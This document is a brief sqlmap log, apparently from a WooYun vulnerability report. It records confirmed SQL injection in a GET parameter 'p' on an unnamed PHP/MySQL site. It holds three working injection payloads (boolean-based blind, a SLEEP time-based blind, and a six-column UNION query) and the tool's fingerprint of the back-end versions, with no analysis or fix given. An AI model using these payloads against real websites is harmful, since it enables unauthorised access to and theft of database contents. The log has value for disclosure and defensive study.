WooYun.org

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: p (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: p=2012%' AND 6034=6034 AND '%'='
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: p=2012%' AND (SELECT * FROM (SELECT(SLEEP(5)))jUGj) AND '%'='
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: p=2012%' UNION ALL SELECT NULL,NULL,CONCAT(0x71766b7671,0x505371654
c55664b416c,0x716b717a71),NULL,NULL,NULL--
---
[08:57:25] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.17
back-end DBMS: MySQL 5.0.12